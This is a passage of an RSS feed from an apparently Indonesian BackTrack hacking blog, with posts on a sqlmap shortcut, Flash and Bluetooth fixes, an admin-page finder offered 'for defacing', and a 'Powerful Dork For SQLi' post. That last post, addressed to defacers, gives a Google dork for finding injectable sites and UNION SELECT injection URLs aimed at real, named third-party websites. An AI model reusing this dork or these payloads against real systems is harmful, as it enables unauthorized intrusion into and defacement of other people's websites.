margin-left: 0px; margin-right: 0px; margin-top: 4px; text-align: left;"&gt;Command :&lt;/div&gt;&lt;div class="body" dir="ltr" style="background-color: black; font-family: 'Courier New', Courier, FreeMono, monospace; font-size: 13px; line-height: 18px; text-align: left;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;&lt;b&gt;root@root&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="color: green; font-family: Monaco, Consolas, Courier, monospace;"&gt;:&lt;/span&gt;&lt;span class="Apple-style-span" style="font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;span class="Apple-style-span" style="color: cyan;"&gt;/pentest/database/sqlmap&lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="color: green; font-family: Monaco, Consolas, Courier, monospace;"&gt;# ./sqlmap.py&lt;/span&gt;&lt;/code&gt;&lt;/div&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-L0E7H7OBtYQ/T1s1mBgthGI/AAAAAAAABQQ/764MhWPDRug/s1600/1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="206" src="http://4.bp.blogspot.com/-L0E7H7OBtYQ/T1s1mBgthGI/AAAAAAAABQQ/764MhWPDRug/s320/1.jpg" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Hal ini menjadi melelahkan dan membosankan jika anda melakukannya berkali-kali. Saya memiliki jalan pintas untuk hal ini, sederhana, namun sangat membantu untuk mempersingkat penetration testing.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Buka terminal, lalu masukan perintah:&lt;/div&gt;&lt;div&gt;&lt;a name='more'&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;div style="font-family: monospace;"&gt;&lt;span class="Apple-style-span" style="font-family: 'Courier New', Courier, FreeMono, monospace; font-size: 13px; line-height: 18px;"&gt;&lt;div class="title" style="background-color: black; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; color: green; font-family: Verdana, Arial, sans-serif; font-size: 13px; font-weight: bold; line-height: 18px; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px; text-align: left;"&gt;Command :&lt;/div&gt;&lt;div class="body" dir="ltr" style="background-color: black; font-family: 'Courier New', Courier, FreeMono, monospace; font-size: 13px; line-height: 18px; text-align: left;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;&lt;b&gt;root@root&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="color: green; font-family: Monaco, Consolas, Courier, monospace;"&gt;:&lt;/span&gt;&lt;span class="Apple-style-span" style="font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;span class="Apple-style-span" style="color: cyan;"&gt;~&lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="color: green; font-family: Monaco, Consolas, Courier, monospace;"&gt;# cd /usr/sbin/&lt;/span&gt;&lt;/code&gt;&lt;/div&gt;&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Kemudian&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="font-family: 'Courier New', Courier, FreeMono, monospace; font-size: 13px; line-height: 18px;"&gt;&lt;div class="title" style="background-color: black; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; color: green; font-family: Verdana, Arial, sans-serif; font-size: 13px; font-weight: bold; line-height: 18px; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px; text-align: left;"&gt;Command :&lt;/div&gt;&lt;div class="body" dir="ltr" style="background-color: black; font-family: 'Courier New', Courier, FreeMono, monospace; font-size: 13px; line-height: 18px; text-align: left;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;&lt;b&gt;root@root&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="color: green; font-family: Monaco, Consolas, Courier, monospace;"&gt;:&lt;/span&gt;&lt;span class="Apple-style-span" style="font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;span class="Apple-style-span" style="color: cyan;"&gt;/usr/sbin&lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="color: green; font-family: Monaco, Consolas, Courier, monospace;"&gt;# ln -s /pentest/database/sqlmap/sqlmap.py&lt;/span&gt;&lt;/code&gt;&lt;/div&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Kemudian&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="font-family: 'Courier New', Courier, FreeMono, monospace; font-size: 13px; line-height: 18px;"&gt;&lt;div class="title" style="background-color: black; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; color: green; font-family: Verdana, Arial, sans-serif; font-size: 13px; font-weight: bold; line-height: 18px; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px; text-align: left;"&gt;Command :&lt;/div&gt;&lt;div class="body" dir="ltr" style="background-color: black; font-family: 'Courier New', Courier, FreeMono, monospace; font-size: 13px; line-height: 18px; text-align: left;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;&lt;b&gt;root@root&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="color: green; font-family: Monaco, Consolas, Courier, monospace;"&gt;:&lt;/span&gt;&lt;span class="Apple-style-span" style="font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;span class="Apple-style-span" style="color: cyan;"&gt;/usr/sbin&lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="color: green; font-family: Monaco, Consolas, Courier, monospace;"&gt;# chmod +x sqlmap.py&lt;/span&gt;&lt;/code&gt;&lt;/div&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Untuk mengeksekusi sqlmap, anda hanya perlu mengetik sqlmap.py pada terminal, tanpa harus mengubah working directory ke /pentest/database/sqlmap&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-sNoQWZ3Eixc/T1s3EhV-skI/AAAAAAAABQY/Foe11dDdl7c/s1600/2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="206" src="http://4.bp.blogspot.com/-sNoQWZ3Eixc/T1s3EhV-skI/AAAAAAAABQY/Foe11dDdl7c/s320/2.jpg" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;created by : &lt;span class="Apple-style-span" style="color: red;"&gt;red-dragon&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4322924474312123143-2308869971760516777?l=www.root-bt.co.cc' alt='' /&gt;&lt;/div&gt;</description><link>http://www.root-bt.co.cc/2012/03/fast-slqmap.html</link><author>noreply@blogger.com (Double Dragon)</author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/-L0E7H7OBtYQ/T1s1mBgthGI/AAAAAAAABQQ/764MhWPDRug/s72-c/1.jpg' height='72' width='72'/><thr:total>1</thr:total></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-4322924474312123143.post-3155897527975494911</guid><pubDate>Mon, 05 Mar 2012 09:35:00 +0000</pubDate><atom:updated>2012-03-05T16:35:42.309+07:00</atom:updated><category domain='http://www.blogger.com/atom/ns#'>flash player</category><category domain='http://www.blogger.com/atom/ns#'>Fix</category><category domain='http://www.blogger.com/atom/ns#'>error</category><category domain='http://www.blogger.com/atom/ns#'>bug</category><category domain='http://www.blogger.com/atom/ns#'>flash</category><title>Install Flash Player On BackTrack</title><description>&lt;div&gt;If have a problem when you open youtube or speedtest because you don't have flash player on your &amp;lt;&amp;lt; back | track.&amp;nbsp;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;Just follow this step.&lt;span class="fullpost"&gt; &lt;/span&gt;&lt;br /&gt;&lt;div&gt;&lt;a name='more'&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="color: white; font-family: 'Courier New', Courier, FreeMono, monospace; font-size: 13px; line-height: 18px;"&gt;&lt;div class="title" style="background-color: black; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-family: Verdana, Arial, sans-serif; font-size: 13px; font-weight: bold; line-height: 18px; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px; text-align: left;"&gt;&lt;span class="Apple-style-span" style="color: lime;"&gt;Command:&lt;/span&gt;&lt;/div&gt;&lt;div class="body" dir="ltr" style="background-color: black; text-align: left;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;root@revolution&lt;/span&gt;&lt;span class="Apple-style-span" style="color: lime;"&gt;:&lt;/span&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;/&lt;/span&gt;&lt;span class="Apple-style-span" style="color: lime;"&gt;# apt-get update&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/div&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Then&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="color: white; font-family: 'Courier New', Courier, FreeMono, monospace; font-size: 13px; line-height: 18px;"&gt;&lt;div class="title" style="background-color: black; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-family: Verdana, Arial, sans-serif; font-size: 13px; font-weight: bold; line-height: 18px; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px; text-align: left;"&gt;&lt;span class="Apple-style-span" style="color: lime;"&gt;Command:&lt;/span&gt;&lt;/div&gt;&lt;div class="body" dir="ltr" style="background-color: black; text-align: left;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;root@revolution&lt;/span&gt;&lt;span class="Apple-style-span" style="color: lime;"&gt;:&lt;/span&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;/&lt;/span&gt;&lt;span class="Apple-style-span" style="color: lime;"&gt;# apt-get install flashplugin-installer&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/div&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Wait until flashplugin-installer finish to download the file, then restart your browser.&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4322924474312123143-3155897527975494911?l=www.root-bt.co.cc' alt='' /&gt;&lt;/div&gt;</description><link>http://www.root-bt.co.cc/2012/03/install-flash-player-on-backtrack.html</link><author>noreply@blogger.com (Double Dragon)</author><thr:total>0</thr:total></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-4322924474312123143.post-8827827195429446342</guid><pubDate>Thu, 23 Feb 2012 09:33:00 +0000</pubDate><atom:updated>2012-02-23T16:33:11.310+07:00</atom:updated><category domain='http://www.blogger.com/atom/ns#'>Admin Page Finder</category><category domain='http://www.blogger.com/atom/ns#'>linux</category><category domain='http://www.blogger.com/atom/ns#'>Deface</category><category domain='http://www.blogger.com/atom/ns#'>Admin</category><category domain='http://www.blogger.com/atom/ns#'>Page</category><category domain='http://www.blogger.com/atom/ns#'>BackTrack</category><title>Admin Page Finder [LINUX]</title><description>Muter-muter sampe kepala muter 360 derajat, tapi belum menemukan hasil dalam mencari admin page finder untuk linux? Jangan kuatir. Saya akan memberikan anda script perl untuk menemukan halaman administrator dalam proses defacing.&lt;span class="fullpost"&gt; &lt;/span&gt;&lt;br /&gt;&lt;div&gt;&lt;a name='more'&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;Anda bisa download di&amp;nbsp;&lt;a href="http://www.mediafire.com/?kzamms4573ico3j" target="_blank"&gt;sini&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Uji keberhasilan script:&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-u4yzTAZt3Yc/T0YHk-Zg4YI/AAAAAAAABQA/sSlreRXPiBA/s1600/1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="233" src="http://2.bp.blogspot.com/-u4yzTAZt3Yc/T0YHk-Zg4YI/AAAAAAAABQA/sSlreRXPiBA/s320/1.jpg" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Screenshoot&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-8KMVg8V1e28/T0YHsoIkHyI/AAAAAAAABQI/kngGxRbn9mM/s1600/2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="233" src="http://1.bp.blogspot.com/-8KMVg8V1e28/T0YHsoIkHyI/AAAAAAAABQI/kngGxRbn9mM/s320/2.jpg" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4322924474312123143-8827827195429446342?l=www.root-bt.co.cc' alt='' /&gt;&lt;/div&gt;</description><link>http://www.root-bt.co.cc/2012/02/admin-page-finder-linux.html</link><author>noreply@blogger.com (Double Dragon)</author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/-u4yzTAZt3Yc/T0YHk-Zg4YI/AAAAAAAABQA/sSlreRXPiBA/s72-c/1.jpg' height='72' width='72'/><thr:total>4</thr:total></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-4322924474312123143.post-4734226269538650322</guid><pubDate>Wed, 22 Feb 2012 08:40:00 +0000</pubDate><atom:updated>2012-02-22T15:41:10.159+07:00</atom:updated><category domain='http://www.blogger.com/atom/ns#'>bluetooth</category><category domain='http://www.blogger.com/atom/ns#'>Fix</category><category domain='http://www.blogger.com/atom/ns#'>bug</category><category domain='http://www.blogger.com/atom/ns#'>BackTrack</category><category domain='http://www.blogger.com/atom/ns#'>bluez</category><title>[FIX] Connection To BlueZ Failed</title><description>Mungkin anda pernah mengalami hal ini ketika anda menginstall bluez.&lt;span class="fullpost"&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-HhCS-aZ-PIU/T0So-I_voiI/AAAAAAAABPo/6ARjvB40g-U/s1600/1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="129" src="http://3.bp.blogspot.com/-HhCS-aZ-PIU/T0So-I_voiI/AAAAAAAABPo/6ARjvB40g-U/s320/1.jpg" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Berikut cara menyembuhaknnya.&lt;br /&gt;&lt;br /&gt;&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Buka terminal, lalu masukan perintah:&lt;br /&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: white; font-family: 'Courier New', Courier, FreeMono, monospace; font-size: 13px; line-height: 18px;"&gt;&lt;/span&gt;&lt;br /&gt;&lt;div&gt;&lt;div class="title" style="background-color: black; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-family: Verdana, Arial, sans-serif; font-size: 13px; font-weight: bold; line-height: 18px; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px; text-align: left;"&gt;&lt;span class="Apple-style-span" style="color: lime;"&gt;Command:&lt;/span&gt;&lt;/div&gt;&lt;div class="body" dir="ltr" style="background-color: black; text-align: left;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;root@revolution&lt;/span&gt;&lt;span class="Apple-style-span" style="color: lime;"&gt;:&lt;/span&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;/&lt;/span&gt;&lt;span class="Apple-style-span" style="color: lime;"&gt;# su -&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;br /&gt;Kemudian&lt;br /&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: white; font-family: 'Courier New', Courier, FreeMono, monospace; font-size: 13px; line-height: 18px;"&gt;&lt;/span&gt;&lt;br /&gt;&lt;div class="title" style="background-color: black; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-family: Verdana, Arial, sans-serif; font-size: 13px; font-weight: bold; line-height: 18px; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px; text-align: left;"&gt;&lt;span class="Apple-style-span" style="color: lime;"&gt;Command:&lt;/span&gt;&lt;/div&gt;&lt;div class="body" dir="ltr" style="background-color: black; text-align: left;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;root@revolution&lt;/span&gt;&lt;span class="Apple-style-span" style="color: lime;"&gt;:&lt;/span&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;/&lt;/span&gt;&lt;span class="Apple-style-span" style="color: lime;"&gt;# bluetoothd -u&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/div&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-ls6nupt6nGg/T0SpnMx-F5I/AAAAAAAABPw/ilXAQtjjBHs/s1600/2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="195" src="http://1.bp.blogspot.com/-ls6nupt6nGg/T0SpnMx-F5I/AAAAAAAABPw/ilXAQtjjBHs/s320/2.jpg" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Kemudian jalankan lagi bluez di System - Preferences - Bluetooth Manager&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-U8FeANTDMKk/T0SpsBNHg9I/AAAAAAAABP4/jAzlMmb7UZE/s1600/3.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="224" src="http://2.bp.blogspot.com/-U8FeANTDMKk/T0SpsBNHg9I/AAAAAAAABP4/jAzlMmb7UZE/s320/3.jpg" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Done. You've got your own bluetooth&lt;br /&gt;&lt;br /&gt;&lt;b&gt;created by : &lt;span class="Apple-style-span" style="color: red;"&gt;red-dragon&lt;/span&gt;&lt;/b&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4322924474312123143-4734226269538650322?l=www.root-bt.co.cc' alt='' /&gt;&lt;/div&gt;</description><link>http://www.root-bt.co.cc/2012/02/fix-connection-to-bluez-failed.html</link><author>noreply@blogger.com (Double Dragon)</author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/-HhCS-aZ-PIU/T0So-I_voiI/AAAAAAAABPo/6ARjvB40g-U/s72-c/1.jpg' height='72' width='72'/><thr:total>0</thr:total></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-4322924474312123143.post-1860572654239221324</guid><pubDate>Thu, 16 Feb 2012 03:22:00 +0000</pubDate><atom:updated>2012-02-16T10:22:44.983+07:00</atom:updated><category domain='http://www.blogger.com/atom/ns#'>Dork</category><category domain='http://www.blogger.com/atom/ns#'>Vulnerable Server</category><category domain='http://www.blogger.com/atom/ns#'>SQL Injection</category><category domain='http://www.blogger.com/atom/ns#'>Vulnerable</category><title>Powerful Dork For SQLi [1]</title><description>Untuk para defacer. Saya akan bagikan dork untuk mencari vulnerable server. Dork ini akan mencari web yang vulnerable terhadap SQLi type UNION QUERY&lt;span class="fullpost"&gt; &lt;/span&gt;&lt;br /&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;a name='more'&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;dork :&amp;nbsp;"The used SELECT statements have a different number of columns" inurl:product.php&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Contoh :&lt;/div&gt;&lt;div&gt;&lt;a href="http://www.bcspeakers.com/product.php?id=-1+union+select+1,@@version,3,4,5,6,7,8,9,10,11,12,13,14,15--" target="_blank"&gt;Vulnerable 1&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;a href="http://www.egmemory.com/product.php?id=-111+union+select+1,@@version--" target="_blank"&gt;Vulnerable 2&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;a 